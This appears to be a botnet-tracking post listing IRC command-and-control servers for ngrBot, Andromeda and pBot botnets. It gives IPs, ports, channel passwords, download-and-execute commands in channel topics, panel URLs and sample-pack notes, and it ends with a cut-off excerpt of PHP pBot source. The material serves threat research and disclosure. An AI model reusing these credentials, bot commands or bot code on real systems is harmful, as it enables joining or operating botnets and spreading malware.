Server: 64.120.135.140:1434
Username: mmgamzu
Nickname: n{DE|XPa}mmgamzu
Channel: #mrag (Password: ngrBot)
Hosting info: http://whois.domaintools.com/64.120.135.140
f0001.info/f0010.info/thismynew1.info (ngrBot hosted in Czech Republic Zlin Fdcservers.net)
Resolved : [f0001.info] To [50.7.193.194]
Resolved : [f0010.info] To [50.7.193.194]
Resolved : [thismynew1.info] To [50.7.193.194]
mom002.net not active now
Server: 50.7.193.194:1887
Server Password:
Username: jhdkutg
Nickname: n{DE|XPa}jhdkutg
Channel: #bon2 (Password: speedd)
Channeltopic: :~pu hxxp://hotfile.com/dl/196250384/528b038/bonkapawes.exe f931d3eb10db2822e2f5d0b989e2a5b4 ~s -o ~s
Download URLs
hxxp://69.197.137.58/ (api.wipmania.com)
hxxp://199.7.177.244/dl/196250388/7241731/avx.exe (hotfile.com)
hxxp://74.120.9.239/get/dd7d65c3bbc12e445706a49c446988ac892a41d5/512e2c88/2/812b96beef6fea89/bb28b14/avx.exe (s251.hotfile.com)
hxxp://199.7.177.244/dl/196250388/7241731/avx.exe (hotfile.com)
hxxp://74.120.9.239/get/a1c05bb55ad6d37d36fec2886739a08919e1fd13/512e2cb6/2/812b96beef6fea89/bb28b14/avx.exe (s251.hotfile.com)
Hosting info: http://whois.domaintools.com/50.7.193.194
92mb samples for analysis
This package has a lot of IRC bot samples, banking trojans and Linux bots. The samples are provided only for analysis purposes; don't run them on your machine, use VMware.
serv16.3sli.us (ngrBot hosted in Romania Bucharest Voxility S.r.l.)
Thanks to the anonymous guy here for the sample, which you can download here: hxxp://sharesend.com/ola3pkmx, and for finding this botnet.
Resolved : [serv16.3sli.us] To [109.163.233.44]
109.163.233.44:8939
Nick: n{US|XPa}uufzjxq
Username: uufzjxq
Server Pass: new
Joined Channel: ##new with Password new
Channel Topic for Channel ##new: “&mod usbi on &mod pdef on &mdns hxxp://109.163.233.44/dns.txt”
Hosting info: http://whois.domaintools.com/109.163.233.44
46.38.63.119 (reptile mod hosted in Russian Federation Moscow Jsc Tel Company)
From the nick format, this looks like a reptile mod.
Local users: 45 147 Current local users 45, max 147
Global users: 45 147 Current global users 45, max 147
Server: 46.38.63.119:6667
Username: 3
Nickname: [D|x86|DEU|XP|1020942]
Channel: #inet (Password: )
Channeltopic: :?bitcoin-24896128560982359857125906 gpu high
* Topic for #inet set by Dexter at Mon Jan 28 15:08:05 2013
ads.pr4d.tk/teams.xsaudix.net/y.servicesql.info (ngrBot hosted in United States Scranton Network Operations Center Inc.)
This botnet was found by the anonymous guy here; thanks to him for the submission.
Resolved : [ads.pr4d.tk] To [64.120.186.229]
Resolved : [teams.xsaudix.net] To [64.120.186.230] Arab hackers
Resolved : [y.servicesql.info] To [64.120.186.228]
Server: 64.120.186.229:1433
Username: zdbcuzs
Nickname: n{DE|XPa}zdbcuzs
Channel: #tmw5 (Password: ngrBot)
Channeltopic: :!u5 hxxp://bmc.linkpc.net/download/s1.exe 5b8fe0ee31617ee9596a5861a2192304 !u5 hxxp://bmc.linkpc.net/s1cr.exe cdfc01b434fc787d487ce088dd391e0b !u6 hxxp://bmc.linkpc.net/chat.exe 7140176e63651b027fd5f3b19252c4bf
Server: 64.120.186.228:1434
Username: mmgamzu
demoralize.biz (Andromeda hosted in Germany Frankfurt Am Main Voxility S.r.l.)
Resolved : [demoralize.biz] To [37.221.170.194]
Panel: hxxp://37.221.170.194/panel/image.php
Module: hxxp://37.221.170.194/panel/r.pack
DirtJumper: demoralize.biz/dj/index.php
Other files: hxxp://demoralize.biz/f/
Hosting info: http://whois.domaintools.com/37.221.170.194
208.117.34.145 (ngrBot hosted in United States Chicago Steadfast Networks)
Server: 208.117.34.145:1887
Server: 185.12.14.131:1887
Username: eyaimlr
Nickname: n{DE|XPa}eyaimlr
Channel: #bon2 (Password: speedd)
Channeltopic: :~pu hxxp://www.sendspace.com/pro/dl/ppbf96 26bc0e7256f2a7fb536bdd19e0464e49 ~s -o ~s
Download URLs
hxxp://69.31.136.17/dlpro/29c185ae59e68f635192223e650939a3/50fe994c/ppbf96/mariayonosy.exe (fs03n5.sendspace.com)
Hosting info: http://whois.domaintools.com/208.117.34.145
105mb samples
This package contains IRC bots, banking trojans, rootkits and other samples. Only for analysis purposes.
irc.by (Linux pBots hosted in Netherlands Netrc Llc)
Resolved : [irc.by] To [91.214.111.26]
Here is the pBot:
    <!--
    set_time_limit(0);
    error_reporting(0);
    class pBot {
        var $config = array("server"=>"irc.by",
                            "port"=>6669,
                            "pass"=>"fx",
                            "prefix"=>"fvox",
                            "maxrand"=>8,
                            "chan"=>"#webs",
                            "key"=>"",
                            "modes"=>"+iB-x",
                            "password"=>"webs",
                            "trigger"=>".",
                            "hostauth"=>"Click.Here.To.Install.These.Updates" // * for any hostname
                            );
        var $users = array();
        function start() {
            if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
                $this->start();
            $ident = "";
            $alph = range("a","z");
            for($i=0;$i<$this->config['maxrand'];$i++)
                $ident .=